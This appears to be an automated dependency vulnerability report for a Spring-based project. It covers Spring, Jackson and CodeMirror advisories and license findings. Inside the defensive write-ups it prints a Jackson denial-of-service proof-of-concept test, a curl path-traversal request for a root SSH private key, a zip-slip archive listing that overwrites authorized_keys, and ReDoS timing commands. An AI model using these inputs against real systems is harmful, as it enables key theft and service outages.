Vulnerabilities

6 via 11 paths

Dependencies

62

Source

GitHub

Commit

f08773ee

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 6
  • 4
Severity
  • 1
  • 3
  • 4
  • 2
Status
  • 10
  • 0
  • 0

critical severity
new

Use of Cache Containing Sensitive Information

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.boot:spring-boot-starter-security@3.5.11

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-security@3.5.11 org.springframework.security:spring-security-web@6.5.8
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.5.12.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Use of Cache Containing Sensitive Information in the process of writing HTTP response headers for servlet applications. An attacker can manipulate HTTP responses by exploiting the failure to write expected headers, potentially leading to unauthorized access or information disclosure.

Remediation

Upgrade org.springframework.security:spring-security-web to version 6.5.9, 7.0.4 or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.19.4, com.fasterxml.jackson.core:jackson-databind@2.19.4 and others

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 com.fasterxml.jackson.core:jackson-core@2.19.4
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.1.
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 com.fasterxml.jackson.core:jackson-databind@2.19.4 com.fasterxml.jackson.core:jackson-core@2.19.4
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.1.
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter-json@3.5.11 com.fasterxml.jackson.core:jackson-databind@2.19.4 com.fasterxml.jackson.core:jackson-core@2.19.4
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@4.0.0.

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.

References

high severity
new

Directory Traversal

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@3.5.11

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework:spring-webmvc@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.5.12.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Directory Traversal via the Script View Templates. An attacker can access sensitive file contents outside of the intended directories by leveraging the Java scripting engine in template rendering.

Note:

This is only exploitable if the application has a mapping for "/**" that results in view rendering, and where the view name is not explicitly specified.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade org.springframework:spring-webmvc to version 6.2.17, 7.0.6 or higher.

References

high severity

GPL-2.0 license

  • Module: mysql:mysql-connector-java
  • Introduced through: mysql:mysql-connector-java@8.0.33

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 mysql:mysql-connector-java@8.0.33

GPL-2.0 license

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: org.webjars.npm:codemirror
  • Introduced through: org.webjars.npm:codemirror@5.65.20

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.webjars.npm:codemirror@5.65.20
    Remediation: Upgrade to org.webjars.npm:codemirror@6.0.1.

Overview

org.webjars.npm:codemirror is a versatile text editor implemented in JavaScript for the browser.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via multiple locations in markdown.js. An attacker can cause excessive resource consumption by submitting a crafted Markdown input that triggers inefficient regular expression processing, causing the editor (or associated service) to freeze the CPU.

Note: The GitHub issue associated with the vulnerability refers to multiple problematic regex patterns; those patterns were introduced, in part, starting from version 2.33.0:

  • /\[[^\]]*\] ?(?:\(|\[)/ introduced in 3.15.0

  • /\[[^\]]*\] ?(?:\(|\[)/ introduced in 3.11.0

  • /\(.*?\)| ?\[.*?\]/ introduced in 5.15.0

  • /^[^> \\]+@(?:[^\\>]|\\.)+>/ introduced in 2.33.0

  • /[^\]]*\](\(.*\)| ?\[.*?\])/ introduced in 5.15.0

While the issue was reported for version 5.17.0, those patterns still exist in recent versions of the package except 6.x.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade org.webjars.npm:codemirror to version 6.0.1 or higher.

References

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter@3.5.11, org.springframework.boot:spring-boot-starter-jdbc@3.5.11 and others

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-jdbc@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-security@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-thymeleaf@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter-json@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32

Dual license: EPL-1.0, LGPL-2.1

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter@3.5.11, org.springframework.boot:spring-boot-starter-jdbc@3.5.11 and others

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-jdbc@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-security@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-thymeleaf@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter-json@3.5.11 org.springframework.boot:spring-boot-starter@3.5.11 org.springframework.boot:spring-boot-starter-logging@3.5.11 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32

Dual license: EPL-1.0, LGPL-2.1

medium severity

MPL-2.0 license

  • Module: net.sf.saxon:Saxon-HE
  • Introduced through: net.sf.saxon:Saxon-HE@10.3

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 net.sf.saxon:Saxon-HE@10.3

MPL-2.0 license

low severity
new

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@3.5.11 and org.springframework.boot:spring-boot-starter-security@3.5.11

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework:spring-web@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.5.12.
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-security@3.5.11 org.springframework.security:spring-security-web@6.5.8 org.springframework:spring-web@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.5.12.
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework.boot:spring-boot-starter-json@3.5.11 org.springframework:spring-web@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.5.12.
  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework:spring-webmvc@6.2.16 org.springframework:spring-web@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.5.12.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.

Note:

This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).

Remediation

Upgrade org.springframework:spring-web to version 6.2.17, 7.0.6 or higher.

References

low severity
new

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@3.5.11

Detailed paths

  • Introduced through: hunnor-dict/admin-spring@hunnor-dict/admin-spring#f08773ee805d8abfe6223f1a201d01538ef903e7 org.springframework.boot:spring-boot-starter-web@3.5.11 org.springframework:spring-webmvc@6.2.16
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.5.12.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.

Note:

This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).

Remediation

Upgrade org.springframework:spring-webmvc to version 6.2.17, 7.0.6 or higher.

References